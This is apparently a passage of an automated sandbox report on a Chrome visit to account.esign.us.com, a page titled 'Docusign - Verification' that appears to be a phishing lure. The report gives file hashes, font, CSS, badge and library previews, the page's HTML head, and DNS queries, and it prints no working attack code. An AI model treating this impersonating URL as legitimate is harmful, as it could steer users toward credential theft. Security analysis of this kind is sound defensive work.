                              SHA1:8581FACE3A3703B4807AA2440E5354EA55A6C4EE
                              SHA-256:B0E7558F4710A1E255B93E3DEEFE3AEBB19F3BB41C150F685A74D3B1A1C79E87
                              SHA-512:590E1E4DCA67CB9088844530EFF20725270421A6C521FC05CF09948DF81AB6DBB0A169F42B58B031AD888F0E7ED863A0221B9243BF2B502E805B82DDCCEE9573
                              Malicious:false
                              Reputation:low
                              URL:https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZ9hiA.woff2
                              Preview:wOF2......_0.......X..^...........................P...H..p.`?STATZ..>.....x.._.....6.$.... ...........7.nS.....@.J}6/.....C.7+6r..Yt...........?'9.1...OU.*(...d2%*gM%J..D...(%.2...E.<.s..;..m.6.nLQ^wd;.....Ohp..AR ...dHl.....[t..|pTQ...6).....D..q.`-{.w\.^..{...........j..\..../8......+L.l.[....v.....8...WW..>..Y.n=.. G.L...8......]sG.....R...".....dI..-%6 ...i..2..",.,...'..0<....V...CjT-...fl..0F..m..-Y*F.`!"(z.ND...o.......(..G......Il...g\..P.D....{..................j+.q....8.6.N.w..8..{..8.....<......).....9.}.L.)<....S.v.Y.Y\.ng!........?.}./.t.B@(X..r.^5i.......//.._..c...A..y..E.....1........-....D..{"...L...3..>............J.S.f.MD....6/EBZ[6.W.P.......,...d..ll.X.#...@.%....h.......pc....m...s.X.B.:.K.ZI>-&."9DE............Dc..-C......D._.H<.i.A..!...PEPT..>[....k..-.......I}....U...6.@..t..C..g....5..m.....-.h.....:....gxp`.....0.Q6..Yax7Nb.?. 9...c....I.1......l.....*.......PL"........}.......(.c?...4.'....R.~.f'.....GR...P..M....
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):569
                              Entropy (8bit):4.9023364401407115
                              Encrypted:false
                              SSDEEP:12:Uc11FP/sO6ZRoT6pHAcigkSAx/s6ZmOHc9n+5cMK00k14enEPCedG:3F8OYsKugXYmOOk4TfenEPCD
                              MD5:D90D7948B5841876B51C2D3D1FA7DF26
                              SHA1:EA1B1FCEF5C8D9C1AEB5A27FB69B195CBC3F0A69
                              SHA-256:CC0BC2CBACA383E1600D349E580513F188E4D745BF269B63FFAFF46A091FD196
                              SHA-512:A2A131E36F8E0BE7015BF22C6FA6F5EA2FCF817EB5E11287CE3BA6274674F2AF3873B0265C8959BA915C05E2BEA4E4F7CF4590135213208CAB84130C6C607A9C
                              Malicious:false
                              Reputation:low
                              URL:https://fonts.googleapis.com/icon?family=Material+Icons
                              Preview:/* fallback */.@font-face {. font-family: 'Material Icons';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2) format('woff2');.}...material-icons {. font-family: 'Material Icons';. font-weight: normal;. font-style: normal;. font-size: 24px;. line-height: 1;. letter-spacing: normal;. text-transform: none;. display: inline-block;. white-space: nowrap;. word-wrap: normal;. direction: ltr;. -webkit-font-feature-settings: 'liga';. -webkit-font-smoothing: antialiased;.}.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):2591
                              Entropy (8bit):5.551944904436444
                              Encrypted:false
                              SSDEEP:48:ejOXaVujOXak8FZjjOXamjOXakj43rjOXadNjOXaUJc+uXjOXaYN0xD:aOXaVqOXak8FZHOXaiOXah3vOXa7OXan
                              MD5:955A06E42819BE6A6D372B7C77E38E15
                              SHA1:843A09FE443606A6C6E0476C85F56E38F6979715
                              SHA-256:A221060E887590FCA4A80048400D6FC61883803F27CF2266920C0B8A16C03D6C
                              SHA-512:35F9A2383A890C955D24C609BCBDDD11F76574C08DF018FA2DE246C21889EEEA7D918E72ED7E4958F3D862F0196A89D1AA2096B45965B434F89D9A12EEB79165
                              Malicious:false
                              Reputation:low
                              URL:https://fonts.googleapis.com/css2?family=Inter:wght@500&display=swap
                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZJhiI2B.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZthiI2B.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v18/UcCO3FwrK3iLTeHuS_nVMrMxCp50SjIw2boKoduKmMEVuI6fAZNhiI2B.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Inter';. font-sty
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:dropped
                              Size (bytes):10804
                              Entropy (8bit):4.481624126994836
                              Encrypted:false
                              SSDEEP:192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U
                              MD5:2928664FE1FC6ACA88583A6F606D60BA
                              SHA1:2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993
                              SHA-256:A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F
                              SHA-512:7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347
                              Malicious:false
                              Reputation:low
                              Preview:<svg id="livetype" xmlns="http://www.w3.org/2000/svg" width="119.66407" height="40" viewBox="0 0 119.66407 40">. <title>Download_on_the_App_Store_Badge_US-UK_RGB_blk_4SVG_092917</title>. <g>. <g>. <g>. <path d="M110.13477,0H9.53468c-.3667,0-.729,0-1.09473.002-.30615.002-.60986.00781-.91895.0127A13.21476,13.21476,0,0,0,5.5171.19141a6.66509,6.66509,0,0,0-1.90088.627A6.43779,6.43779,0,0,0,1.99757,1.99707,6.25844,6.25844,0,0,0,.81935,3.61816a6.60119,6.60119,0,0,0-.625,1.90332,12.993,12.993,0,0,0-.1792,2.002C.00587,7.83008.00489,8.1377,0,8.44434V31.5586c.00489.3105.00587.6113.01515.9219a12.99232,12.99232,0,0,0,.1792,2.0019,6.58756,6.58756,0,0,0,.625,1.9043A6.20778,6.20778,0,0,0,1.99757,38.001a6.27445,6.27445,0,0,0,1.61865,1.1787,6.70082,6.70082,0,0,0,1.90088.6308,13.45514,13.45514,0,0,0,2.0039.1768c.30909.0068.6128.0107.91895.0107C8.80567,40,9.168,40,9.53468,40H110.13477c.3594,0,.7246,0,1.084-.002.3047,0,.6172-.0039.9219-.0107a13.279,13.279,0,0,0,2-.1768,6.80432,6.80432,0,0
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:SVG Scalable Vector Graphics image
                              Category:downloaded
                              Size (bytes):10804
                              Entropy (8bit):4.481624126994836
                              Encrypted:false
                              SSDEEP:192:v6+WE7QxvAjShzwzb7M1/myAYUNNdZnvGuQTF4U:v6+Pkxv44q/EH10U
                              MD5:2928664FE1FC6ACA88583A6F606D60BA
                              SHA1:2F2FE1CBD0563B3CE3EA79FCDF1549ED244B3993
                              SHA-256:A26FC5B38380272C92E9019A2EB8B45542A66814B3E2B203772DB8904B9FB99F
                              SHA-512:7D6F8B7E54A4DA3CF81C767B4AA40C3B04BAFE35F2DD77B85944DE4442F0B1DD1A8EDA0175DEB4652CF055094ACDC0D4B6E38ABE51C52A3DFBF887481315B347
                              Malicious:false
                              Reputation:low
                              URL:https://developer.apple.com/assets/elements/badges/download-on-the-app-store.svg
                              Preview:<svg id="livetype" xmlns="http://www.w3.org/2000/svg" width="119.66407" height="40" viewBox="0 0 119.66407 40">. <title>Download_on_the_App_Store_Badge_US-UK_RGB_blk_4SVG_092917</title>. <g>. <g>. <g>. <path d="M110.13477,0H9.53468c-.3667,0-.729,0-1.09473.002-.30615.002-.60986.00781-.91895.0127A13.21476,13.21476,0,0,0,5.5171.19141a6.66509,6.66509,0,0,0-1.90088.627A6.43779,6.43779,0,0,0,1.99757,1.99707,6.25844,6.25844,0,0,0,.81935,3.61816a6.60119,6.60119,0,0,0-.625,1.90332,12.993,12.993,0,0,0-.1792,2.002C.00587,7.83008.00489,8.1377,0,8.44434V31.5586c.00489.3105.00587.6113.01515.9219a12.99232,12.99232,0,0,0,.1792,2.0019,6.58756,6.58756,0,0,0,.625,1.9043A6.20778,6.20778,0,0,0,1.99757,38.001a6.27445,6.27445,0,0,0,1.61865,1.1787,6.70082,6.70082,0,0,0,1.90088.6308,13.45514,13.45514,0,0,0,2.0039.1768c.30909.0068.6128.0107.91895.0107C8.80567,40,9.168,40,9.53468,40H110.13477c.3594,0,.7246,0,1.084-.002.3047,0,.6172-.0039.9219-.0107a13.279,13.279,0,0,0,2-.1768,6.80432,6.80432,0,0
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):2228
                              Entropy (8bit):7.82817506159911
                              Encrypted:false
                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                              MD5:EF9941290C50CD3866E2BA6B793F010D
                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                              Malicious:false
                              Reputation:low
                              URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                              Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (43748), with CRLF line terminators
                              Category:downloaded
                              Size (bytes):287196
                              Entropy (8bit):6.0648318979601905
                              Encrypted:false
                              SSDEEP:6144:7v0J0Yd5lHI38+QPbll7ga3ZYThRK5+VcJ/dg7qp:7vkvn9ISzll7FKhRjkf
                              MD5:C6E864E56E1CF59CC4CC22FAAD40F116
                              SHA1:6FC3B18767E861A496157D6EDFF783EAC2C44516
                              SHA-256:CA9B4FE3468E648B04F9FC8957285A1205C76E8883EE2D2950CBE4235E896B27
                              SHA-512:5FFA6237B623773473398727CCE9FFAD83488127A61DB84D5F2596A52E3643C78768CFDF9706BF25F9118A91DECA5711ACB7DCE5AE5C03176D683A305C1580E8
                              Malicious:false
                              Reputation:low
                              URL:https://account.esign.us.com/documentWizard.html?Uv=4WaUN2Pkric74yNetF
                              Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Docusign - Verification</title>.. <link rel="icon" type="image/x-icon" href="data:image/x-icon;base64,AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8ATPj/AEz//wBM//8ATP//AEz//wBM//8ATP//AEz//wBM//8ATP//AEv+/wBMfAAAAAAAAAAAAAAAAAAAAAD/AEz//wBM//8ATP//AEz//wBM//8ATP//AEz//wBM//8ATP//AEz//wBL/v8ASn8AAAAAAAAAAAAAAAAAAAAA/wBM//8ATP//AEz//wBM//8ATP//AEz//wBM//8ATP//AEz//wBM//8AS/7/AEp/AAAAAAAAAAAAAAAAAAAAAP8ATP//AEz//wBM//8ATP//AEz//wBM//8ATP//AEz//wBM//8ATP//AEv+/wBKfwAAAAAAAAAAAAAAAAAAAAD/AEz//wBM//8ATP//AEz/xQA6/38AJf9+ACT/fgAk/34AJP9+ACT/fgAl/3Ebb79RUf9eSkr/GAAAAAAAAAAA/wBM//8ATP//AEz//wBM/38AJf8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8oKH7/UlL//VJS/9dRUf9CAAD/Af8ATP//AEz//wBM//8ATP9+ACT/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/KCh+/1JS//9SUv//UlL/20xM/x7/AEz//wBM//8AT
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with no line terminators
                              Category:downloaded
                              Size (bytes):52
                              Entropy (8bit):4.5395834108987785
                              Encrypted:false
                              SSDEEP:3:OdCd/ZoSb9inuSISHmn:OdCd/ZoSb99Sfmn
                              MD5:E5ABEC1C9A505AC76B6AA29071ED1082
                              SHA1:9B3D310EAC34E7C05270AD5E902A077019B7D317
                              SHA-256:5F1331C24E99130BEBFCAC9910702F8D560DD09A639E3C29901402FE19A64D0E
                              SHA-512:D1C91772CB0DBA86C4D264963694BD05ED3B4E16C70A3EC66508F35F7257D4932A5D917B6CEA40FB8F1A5084510FC1CE314DD604991FCEDCA1BDEA4B831A0B33
                              Malicious:false
                              Reputation:low
                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIuCYHyZX_ZHdoAEgUNoV9LmxIFDZFhlU4SBQ2UkJL6EgUNBu27_yHmEUAwvElXuA==?alt=proto
                              Preview:CiQKBw2hX0ubGgAKBw2RYZVOGgAKBw2UkJL6GgAKBw0G7bv/GgA=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (20712)
                              Category:downloaded
                              Size (bytes):20713
                              Entropy (8bit):5.053868437066879
                              Encrypted:false
                              SSDEEP:192:CBh5Cif2IgOmgOua1YldXaugk7OyC7AL2DSYy3epAd/3nsTeUxX:CB72InJaq+ROOyC7AN3Mu/XsTeUxX
                              MD5:53EF696D417D353EFBD07C105F694756
                              SHA1:F37FBCF88F577F3152B8EC113D83B843DC6E2BC8
                              SHA-256:B166631D0898F5FBE179400EA31AECCF0F56A61977CEA7D56B3D6464A12FA2DF
                              SHA-512:36FB911A53DFE9C1E9C50A811A73DEEDF3E8002A72AE386548D79755463B059023D67361B8DA5106ADE8B02E32AF6BECC1412E1EAD87B42B18DAF7CB3429DD60
                              Malicious:false
                              Reputation:low
                              URL:https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.css
                              Preview:.swal2-popup.swal2-toast{box-sizing:border-box;grid-column:1/4 !important;grid-row:1/4 !important;grid-template-columns:min-content auto min-content;padding:1em;overflow-y:hidden;background:#fff;box-shadow:0 0 1px rgba(0,0,0,.075),0 1px 2px rgba(0,0,0,.075),1px 2px 4px rgba(0,0,0,.075),1px 3px 8px rgba(0,0,0,.075),2px 4px 16px rgba(0,0,0,.075);pointer-events:all}.swal2-popup.swal2-toast>*{grid-column:2}.swal2-popup.swal2-toast .swal2-title{margin:.5em 1em;padding:0;font-size:1em;text-align:initial}.swal2-popup.swal2-toast .swal2-loading{justify-content:center}.swal2-popup.swal2-toast .swal2-input{height:2em;margin:.5em;font-size:1em}.swal2-popup.swal2-toast .swal2-validation-message{font-size:1em}.swal2-popup.swal2-toast .swal2-footer{margin:.5em 0 0;padding:.5em 0 0;font-size:.8em}.swal2-popup.swal2-toast .swal2-close{grid-column:3/3;grid-row:1/99;align-self:center;width:.8em;height:.8em;margin:0;font-size:2em}.swal2-popup.swal2-toast .swal2-html-container{margin:.5em 1em;padding:0;ov
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):2228
                              Entropy (8bit):7.82817506159911
                              Encrypted:false
                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                              MD5:EF9941290C50CD3866E2BA6B793F010D
                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 25 x 25, 8-bit gray+alpha, non-interlaced
                              Category:dropped
                              Size (bytes):462
                              Entropy (8bit):6.832834205355095
                              Encrypted:false
                              SSDEEP:12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr
                              MD5:3116E1AF6C57317209879BED595ACE28
                              SHA1:DB24192BD54896DA5994A8507942FA80A4427185
                              SHA-256:894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544
                              SHA-512:68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR.............n.M.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME.....(*AK......IDAT8...J.A...3aR..,.V"..Z......?B..I.Y.+.a..L..f.....$...........D!I.K....:R.T.T*...S\oO%Y.d7.n.ZF.-.p#;.S...1F.WJ.C6.....,,...j/_..V.y.&...F.+w.;....D.....R..5{......w..JYv<TX..6.,.J...5.cg..%.......{.l....."]..q....%tEXtdate:create.2024-06-22T15:40:41+00:00..o....%tEXtdate:modify.2024-06-22T15:40:41+00:00...P....IEND.B`.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 646 x 250, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):4904
                              Entropy (8bit):7.899029446643728
                              Encrypted:false
                              SSDEEP:96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt
                              MD5:1E91D02CF5A902F38F2923C006D79281
                              SHA1:CB8126B32C2274E0394246B40BD0B7F9F847E44C
                              SHA-256:F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849
                              SHA-512:54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR..............+v.....PLTEGpLWWW^^^fffnnnaaaxxx.........sss\\\.........hhhIII***.........sss...444}}}...>>>SSSYYYjjj...}}}^^^ @@@ppp......```000PPP....J$._/'~>$t9.T*.5.........................................*.D4.S1.N....................... ...I.*.kkk..................zzz....?.......!i4...$]c....2d.:.....:u.B..=.....8.N..nS.:.N.......?/.;.N......=.N~^......^G.?.N....v.@.NO;..j...............<.T/#.5.\..7L...xK.OY.C5.q#.n!.2(9...;/I...?2u"..*!...;..X....%...K..7+I..g...&.,..H..G..E..FFu..a.... tRNS.:..........................j...N}......IDATx...Ub.@.E..I71.0.....C.5.............................?...._.r..[........E...v^Ne...E;+..l..n..c...]w..|r...m>.w=...2..5.+......tW..].........6m.i..).Y.h.B.k....j.*......T.l.\.<...T.H2.._...a.....u...e.}.Op...J.....I.j.....>.C...&.tW.T0Kr..I..4.v.].OrSie..!O.......!......!.g..Z.0......r..|4.h.t..{.............N...fi..-R....LH9#....7I$..$..o.T....8......@A<y..s....K...%Wt.y.z..].i.h...T..l.E6.....S7C
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 646 x 250, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):4904
                              Entropy (8bit):7.899029446643728
                              Encrypted:false
                              SSDEEP:96:OdBnjzG7DZTxqIfy33nn/qf46vhPQuAgul5SZBsj51v1f:OdBnjwDZTx5fy33no4ShRjuX2sd1vt
                              MD5:1E91D02CF5A902F38F2923C006D79281
                              SHA1:CB8126B32C2274E0394246B40BD0B7F9F847E44C
                              SHA-256:F72611E2DF8E88204009FD896D05D5E8E83C77009C63943BBFFA169559934849
                              SHA-512:54B69544DC55ADDC0B2DDC08418D1A0A34240697070FE47FEAE9E915C70D33EF662CE1B7154CBCAD84019D22F3291F138CC7298224D381CC740C2097478D4042
                              Malicious:false
                              Reputation:low
                              URL:https://play.google.com/intl/en_us/badges/static/images/badges/en_badge_web_generic.png
                              Preview:.PNG........IHDR..............+v.....PLTEGpLWWW^^^fffnnnaaaxxx.........sss\\\.........hhhIII***.........sss...444}}}...>>>SSSYYYjjj...}}}^^^ @@@ppp......```000PPP....J$._/'~>$t9.T*.5.........................................*.D4.S1.N....................... ...I.*.kkk..................zzz....?.......!i4...$]c....2d.:.....:u.B..=.....8.N..nS.:.N.......?/.;.N......=.N~^......^G.?.N....v.@.NO;..j...............<.T/#.5.\..7L...xK.OY.C5.q#.n!.2(9...;/I...?2u"..*!...;..X....%...K..7+I..g...&.,..H..G..E..FFu..a.... tRNS.:..........................j...N}......IDATx...Ub.@.E..I71.0.....C.5.............................?...._.r..[........E...v^Ne...E;+..l..n..c...]w..|r...m>.w=...2..5.+......tW..].........6m.i..).Y.h.B.k....j.*......T.l.\.<...T.H2.._...a.....u...e.}.Op...J.....I.j.....>.C...&.tW.T0Kr..I..4.v.].OrSie..!O.......!......!.g..Z.0......r..|4.h.t..{.............N...fi..-R....LH9#....7I$..$..o.T....8......@A<y..s....K...%Wt.y.z..].i.h...T..l.E6.....S7C
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 25 x 25, 8-bit gray+alpha, non-interlaced
                              Category:downloaded
                              Size (bytes):462
                              Entropy (8bit):6.832834205355095
                              Encrypted:false
                              SSDEEP:12:6v/7ECUPfn6mCx9OOsTNmNLw8h6/KzSkCt1RKEM0Ht1B:xPiA1Z8h6yzRqWEMEr
                              MD5:3116E1AF6C57317209879BED595ACE28
                              SHA1:DB24192BD54896DA5994A8507942FA80A4427185
                              SHA-256:894EFF46E7DE96D535594F704E544C8B95F0956285AE535FCB9985D5C9996544
                              SHA-512:68108788CFE930A64BF38D19BA02FBFE271E37AD0FD21EC7939DC10BA10BBD3AA9029627506A140E55012A46C8931BDEF94C7FEB93F513F2B4A65F61C5A33AF8
                              Malicious:false
                              Reputation:low
                              URL:https://upload.wikimedia.org/wikipedia/commons/thumb/2/2b/Windows_logo_2012-Black.svg/25px-Windows_logo_2012-Black.svg.png
                              Preview:.PNG........IHDR.............n.M.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME.....(*AK......IDAT8...J.A...3aR..,.V"..Z......?B..I.Y.+.a..L..f.....$...........D!I.K....:R.T.T*...S\oO%Y.d7.n.ZF.-.p#;.S...1F.WJ.C6.....,,...j/_..V.y.&...F.+w.;....D.....R..5{......w..JYv<TX..6.,.J...5.cg..%.......{.l....."]..q....%tEXtdate:create.2024-06-22T15:40:41+00:00..o....%tEXtdate:modify.2024-06-22T15:40:41+00:00...P....IEND.B`.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (43300)
                              Category:downloaded
                              Size (bytes):43365
                              Entropy (8bit):5.248811076277145
                              Encrypted:false
                              SSDEEP:768:WPbVoLscD1xXIIe6oOlCczwCF9av8Bm58uD7hWuUewNlaAU1GV1pUrxvXELQe2S7:QomIjigMb7h4lKiOGaLxm1m9Bk
                              MD5:3042F5F45C2338989497F11F1E4813D8
                              SHA1:6D018A5F343991F4CBFDC5BA18B429787D1BF1C5
                              SHA-256:EF23C3CAE3EDA672437471D564F354F2C93E9BBA47D4F789DB501C48DA758F3B
                              SHA-512:6784183527360C5BFC2EB84C1326AB10FDEB0643830594FDD11C140BB758418176F55E1D7E487EF286191EDD11E93DFF28DBF7DBFBB45BA89C19651493D5748C
                              Malicious:false
                              Reputation:low
                              URL:https://cdn.jsdelivr.net/npm/sweetalert2@11.6.15/dist/sweetalert2.min.js
                              Preview:/*!.* sweetalert2 v11.6.15.* Released under the MIT License..*/.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).Sweetalert2=t()}(this,(function(){"use strict";var e={awaitingPromise:new WeakMap,promise:new WeakMap,innerParams:new WeakMap,domCache:new WeakMap};const t=e=>{const t={};for(const n in e)t[e[n]]="swal2-"+e[n];return t},n=t(["container","shown","height-auto","iosfix","popup","modal","no-backdrop","no-transition","toast","toast-shown","show","hide","close","title","html-container","actions","confirm","deny","cancel","default-outline","footer","icon","icon-content","image","input","file","range","select","radio","checkbox","label","textarea","inputerror","input-label","validation-message","progress-steps","active-progress-step","progress-step","progress-step-line","loader","loading","styled","top","top-start","top-end","top-left","top-righ
                              No static file info
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Mar 21, 2025 18:44:27.924280882 CET192.168.2.61.1.1.10x6834Standard query (0)www.google.comA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:27.924544096 CET192.168.2.61.1.1.10x8e77Standard query (0)www.google.com65IN (0x0001)false
                              Mar 21, 2025 18:44:29.010727882 CET192.168.2.61.1.1.10x65ffStandard query (0)account.esign.us.comA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:29.013665915 CET192.168.2.61.1.1.10x8caaStandard query (0)account.esign.us.com65IN (0x0001)false
                              Mar 21, 2025 18:44:29.701042891 CET192.168.2.61.1.1.10xaf74Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:29.701426029 CET192.168.2.61.1.1.10x6ac9Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                              Mar 21, 2025 18:44:30.084924936 CET192.168.2.61.1.1.10x12e1Standard query (0)play.google.comA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:30.085071087 CET192.168.2.61.1.1.10x443dStandard query (0)play.google.com65IN (0x0001)false
                              Mar 21, 2025 18:44:30.592247009 CET192.168.2.61.1.1.10xc715Standard query (0)play.google.comA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:30.592390060 CET192.168.2.61.1.1.10x51a7Standard query (0)play.google.com65IN (0x0001)false
                              Mar 21, 2025 18:44:42.969039917 CET192.168.2.61.1.1.10xf02bStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:42.969244003 CET192.168.2.61.1.1.10x9b1dStandard query (0)upload.wikimedia.org65IN (0x0001)false
                              Mar 21, 2025 18:44:43.436299086 CET192.168.2.61.1.1.10x6512Standard query (0)account.esign.us.comA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:43.591180086 CET192.168.2.61.1.1.10x6ad0Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:43.591464996 CET192.168.2.61.1.1.10xf021Standard query (0)upload.wikimedia.org65IN (0x0001)false
